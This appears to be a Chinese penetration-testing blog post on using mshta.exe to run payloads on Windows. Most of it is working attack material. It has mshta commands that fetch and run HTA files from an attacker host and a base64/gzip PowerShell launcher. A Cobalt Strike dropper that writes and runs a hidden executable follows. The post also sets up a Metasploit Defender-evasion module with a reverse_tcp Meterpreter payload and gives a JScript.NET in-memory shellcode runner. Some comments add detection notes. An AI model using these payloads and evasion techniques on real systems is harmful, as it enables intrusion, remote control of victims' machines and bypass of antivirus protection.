@Author: Patrilic
@Time: 2019-05-08 11:20:33

0x01 mshta

👉官方文档直通车 –>🚗滴滴滴)

思路:利用Mshta执行JavaScript/VBscript 调用WScript.shell执行命令
结合VBS下载C2 payload,JS下载payload,JSRAT,直接反弹session……
eg:

mshta vbscript:window.execScript("alert('hello world!');","javascript") 

mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs")

测试:

Attacker : 192.168.199.142 MacOS
Victim : 192.168.121.130 Windows 10 1809

0x02 MetaSploit::hta_server

exploit/windows/misc/hta_server
418b9f4a3fb34ef94542812b0130a9f8

受害机执行

mshta http://192.168.199.142:8080/wSbMp9V.hta

会被Defender拦截
样本分析

为Base64编码的ps1代码(Base64只是编码,并非加密)

# Stage-1 PowerShell launcher carried by the HTA.
# Chooses the PowerShell binary: in a 32-bit process [IntPtr]::Size is 4 and the bare name is used;
# in a 64-bit process it deliberately picks the 32-bit host under syswow64.
if([IntPtr]::Size -eq 4){
$b='powershell.exe'
}else{
$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
# Child process runs with no profile and a hidden window (-nop -w hidden). Its -c argument
# base64-decodes a blob, inflates it as a gzip stream and executes the text as a script block.
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
# Window is hidden twice over (WindowStyle plus CreateNoWindow) and stdout is captured.
# Detection note: a hidden powershell.exe child launched from syswow64 with a long base64+gzip
# command line is what process-creation / command-line logging sees; AMSI sees the decoded
# script block once it is created.
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

解码后

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIABhN0FwCA7VW+2/aSBD+OZH6P1gVkm2FYCC0aSJVujVPE5xAHAiEQ6fFXtsLa5vYa169/u83C3abXtO79qSzeOxjZnbmm29m7aahzWkUSr4xlz69OT3p4xgHklJwR1dFqRDdqCcnsFrYs2pd+igpU7RaNaIA03B2fV1P45iE/DgvtQlHSUKCOaMkUVTpT+nRJzE5v5sviM2lT1Lhj1KbRXPMMrFdHds+kc5R6Ii9XmRj4UrJWjHKFfn332V1el6ZlZrPKWaJIlu7hJOg5DAmq9JnVRz4sFsRRTapHUdJ5PLSIw0vqqVhmGCX3IK1NTEJ9yMnkVWIAj4x4WkcSod4hIHjtiLDsB9HNnKcmCSJXJSmwvR0NvtNmWbn3qchpwEpGSEncbSySLymNklKHRw6jNwTdwZaFo9p6M1UFcTW0ZIohTBlrCj9ihnllmxy1H5WSXmpBFJ9HqtFSOMrcZqRkzJy1JRfcVSkXoXnmH7A7fOb0zenbk6U+YX5kigwOpkexgRcU/pRQg9iH6VyUTLhEMyjeAfTwkOcEnX2BVipsF4Wf6xdyUVB0Kt0rS2sTUcRdWagkyWzsAnmYvnHnGwQl4aksQtxQO2cdsprABOXkUOApVzsFpxS5GyDOA3CiIe5gEzk+Tu1ZkD5F109pcwhMbIhSQl4BflTv3XmmAVFNkKTBIDQcQ7EK7hAdpJLZwTf5aeLOQjJdYaTpCj1U6g2uyhZBDPiFCUUJjTbQimPDkP5q7tmyji1ccJzczM1gzE7rh6FCY9TG3IGoT9YK2JTzAQSRalDHaLvLOrlx8qv4lDHjEEJgKU15AFWRPwWF0yIwUPIulqyCDeCFSMBSBxqvsWwBxWe0fxAHOwRR/6bezmLj5QVOOQAvHAOkmuxiBelEY05dA6B6YFB/+XwFy1DuFGPSZYEJS+Mqb7jgs+FjXUlyJghcog/5hB7K44CHSfkfe3YHJS32h2tI3gmRshMW1/SCtrQimHCd0gvjKhx6dx0Fx0tbmx9FxmJYXb6jUGnU1t3rVGNW02D3/QNbjbHi4WFOvfDCX8yUOeBlpeT2n7VpXurh5zJVnu/1/ebsr7dLzzHnTRc17t0rfvKuxbtPdYHermKe41m2nvUN3q5ljTppjOgw8Gy2+LzyYjhoat548oVpttevBhVInNvINT2L+x91x21fdPZTTqULLRyjw7QAKEb+344bHsrr50g7Wr0XA8W6NkkdxgZqDnadd8xfTBs6WjY1Af4LupfnDW0ypPz3Gw9jXE3YE67o1UmY+SgWHvw/MrlnR8KnLCnP+tCBvWedi0NZPo11KlV6f7pedD2UBNkRkGEcIsuh2djsHn7ADqPw4oTIR4aY00beZqHXMufYKSDtP6MWnpU333om31tNKr6lfmy4oPPZLz+YHbRWcvua5p2FszhV0O2udqGY31zud5w3H0E2w/a1fDjW8EQoEhhVa0+vcj9j7q1iePExww4AW04L8FWFLey3tqPqNBQFHEZL0kcEga3Gdx3OZURY5Et+rpownClHBu9uHeGMLyovjpSpS+C6td2ny9dXz+Bj1AaQN9Sj4Qe94vl7UW5DO27vK2VIcSfD6serXaKsFQU3f8AS2aZHSyromAK6fJ/xSqrUR/+nH/
B6uvaP+z+FH7l4jHa75a/XfglNH818EdMOQha0GMYOV5vr8af0eLF1Z8uIedu9og3t7uUn9/C+8Cb078ABtGBSyEKAAA=''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Gzip压缩流再经Base64编码

Defender拦截

0x03 Cobalt Strike

Attacks –> Packages –> HTML Application

b38801405640b4a557ac53ba451a66db

生成的.HTA文件存在本地,可以通过多种方式传入受害机
受害机上执行命令

mshta http://192.168.199.142:8080/evil.hta

evil.hta

<script language="VBScript">
' Dropper routine: turns the hex string in var_shellcode (the page notes it is actually a
' PE image, not raw shellcode) into a temp .exe, runs it hidden, then deletes the evidence.
' Detection note: mshta.exe writing an .exe under %TEMP% and then spawning it is the
' observable chain here (file-create + process-create with mshta as parent).
Function var_func()
var_shellcode = "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"

' Scripting.FileSystemObject handles every file-system step below.
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
' GetSpecialFolder(2) is the TemporaryFolder; a randomly named subfolder is created inside it.
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
' The binary is written through a text stream (overwrite = true, unicode = false):
' each two-character hex pair becomes one byte via Chr(CLng("&H" & pair)).
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
' Wscript.Shell.Run with window style 0 (hidden) and bWaitOnReturn = true: blocks until the exe exits.
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
' Cleanup runs only after the child exits, so the file is on disk for the whole run time.
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

' Entry point: run the dropper once, then close the HTA window.
var_func
self.close
</script>

可以看到所谓的shellcode实际是十六进制编码的PE文件,落地为临时exe后通过Wscript.Shell执行

同样会被Defender拦截

0x04 MetaSploit::windows_defender_js_hta

Msf5更新后新加入了两个evasion模块

  • evasion/windows/windows_defender_exe
  • evasion/windows/windows_defender_js_hta

exe报毒有点惨淡
3e2ff0218d8efce1f3709b339560c13e

但Defender和火绒仍然不报毒
dc2b1ad02452c9baafe83eae5ee3d588

hta文件
d83749536340df88df744509897dc80a
Defender,火绒,360都能过
0533eaf110cdcc3a1583fd3e03cb12ed

msf5 > use evasion/windows/windows_defender_js_hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set lhost 192.168.1
set lhost 192.168.1.105 set lhost 192.168.121.1
msf5 evasion(windows/windows_defender_js_hta) > set lhost 192.168.1.105
lhost => 192.168.1.105
msf5 evasion(windows/windows_defender_js_hta) > set lport 8877
lport => 8877
msf5 evasion(windows/windows_defender_js_hta) > exploit

[+] QWZwXErrm.hta stored at /Users/patrilic/.msf4/local/QWZwXErrm.hta

核心代码

import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;

// Generic P/Invoke shim (JScript.NET). Instead of a static DllImport declaration it emits a
// throw-away in-memory assembly holding one PinvokeImpl method bound to dllName/methodName
// and calls it by reflection. Returns the native result boxed as Object.
// Detection note: Reflection.Emit plus DllImportAttribute from a script host such as mshta is
// the observable here; .NET runtime ETW assembly-load events should show the dynamic
// assembly (confirm against the hunting telemetry in use).
function InvokeWin32(dllName:String, returnType:Type,
methodName:String, parameterTypes:Type[], parameters:Object[])
{
// Begin to build the dynamic assembly (Run-only access: never persisted to disk)
var domain = AppDomain.CurrentDomain;
var name = new System.Reflection.AssemblyName('PInvokeAssembly');
var assembly = domain.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
var module = assembly.DefineDynamicModule('PInvokeModule');
var type = module.DefineType('PInvokeType',TypeAttributes.Public + TypeAttributes.BeforeFieldInit);

// Define the actual P/Invoke method (public static, marked PinvokeImpl so the CLR marshals it)
var method = type.DefineMethod(methodName, MethodAttributes.Public + MethodAttributes.HideBySig + MethodAttributes.Static + MethodAttributes.PinvokeImpl, returnType, parameterTypes);

// Apply the P/Invoke constructor: DllImportAttribute(string) with dllName as its only argument
var ctor = System.Runtime.InteropServices.DllImportAttribute.GetConstructor([Type.GetType("System.String")]);
var attr = new System.Reflection.Emit.CustomAttributeBuilder(ctor, [dllName]);
method.SetCustomAttribute(attr);

// Create the temporary type, and invoke the method.
var realType = type.CreateType();
return realType.InvokeMember(methodName, BindingFlags.Public + BindingFlags.Static + BindingFlags.InvokeMethod, null, null, parameters);
}

// kernel32!VirtualAlloc through InvokeWin32. lpStartAddr is typed UInt32 rather than a
// pointer; the only caller passes 0. The native return is declared as IntPtr.
function VirtualAlloc( lpStartAddr:UInt32, size:UInt32, flAllocationType:UInt32, flProtect:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.UInt32")];
var parameters:Object[] = [lpStartAddr, size, flAllocationType, flProtect];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "VirtualAlloc", parameterTypes, parameters );
}

// kernel32!CreateThread through InvokeWin32. lpThreadId is typed UInt32 and passed by value,
// so the caller's 0 reaches the API as a NULL pointer, not as an out-parameter.
function CreateThread( lpThreadAttributes:UInt32, dwStackSize:UInt32, lpStartAddress:IntPtr, param:IntPtr, dwCreationFlags:UInt32, lpThreadId:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.UInt32"),Type.GetType("System.UInt32"),Type.GetType("System.IntPtr"),Type.GetType("System.IntPtr"), Type.GetType("System.UInt32"), Type.GetType("System.UInt32") ];
var parameters:Object[] = [lpThreadAttributes, dwStackSize, lpStartAddress, param, dwCreationFlags, lpThreadId ];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "CreateThread", parameterTypes, parameters );
}

// kernel32!WaitForSingleObject through InvokeWin32. The return type is declared IntPtr
// although the API returns a DWORD; the caller in this file discards the result anyway.
function WaitForSingleObject( handle:IntPtr, dwMiliseconds:UInt32)
{
var parameterTypes:Type[] = [Type.GetType("System.IntPtr"),Type.GetType("System.UInt32")];
var parameters:Object[] = [handle, dwMiliseconds ];

return InvokeWin32("kernel32.dll", Type.GetType("System.IntPtr"), "WaitForSingleObject", parameterTypes, parameters );
}

// In-process shellcode runner: base64-decode -> VirtualAlloc(RWX) -> copy -> CreateThread -> wait.
// Detection note: a private RWX commit followed by a new thread starting inside that region,
// in an mshta.exe process, is the memory-telemetry pattern defenders key on; there is no
// W^X transition to hide behind because the page is executable from the moment it is committed.
function ShellCodeExec()
{
var MEM_COMMIT:uint = 0x1000;
var PAGE_EXECUTE_READWRITE:uint = 0x40;

// Payload is carried as a base64 string inside the HTA itself (no download at this stage).
var shellcodestr:String = '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'
var shellcode:Byte[] = System.Convert.FromBase64String(shellcodestr);
// Allocation is exactly the payload length, committed RWX in one call.
var funcAddr:IntPtr = VirtualAlloc(0, UInt32(shellcode.Length),MEM_COMMIT, PAGE_EXECUTE_READWRITE);


// Marshal.Copy moves the managed byte[] into the unmanaged RWX region.
Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
var hThread:IntPtr = IntPtr.Zero;
var threadId:UInt32 = 0;
// prepare data
var pinfo:IntPtr = IntPtr.Zero;
// execute native code: the thread's start address is the allocated buffer itself
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, threadId);
// 0xFFFFFFFF is INFINITE: the script blocks until the payload thread ends.
WaitForSingleObject(hThread, 0xFFFFFFFF);

}
// Entry point. The empty catch swallows every failure, so a blocked or crashed stage
// leaves no error dialog behind; the host simply exits quietly.
try{
ShellCodeExec();
}catch(e){}

hta代码片段
a67569474b21379b1c9d6c0b41a63a4e

Wscript.shell执行

生成JS执行Shellcode

CACTUSTORCH.hta
使用mshta.exe绕过应用程序白名单(多种方法)
第七十五课:基于白名单Mshta.exe执行payload第五季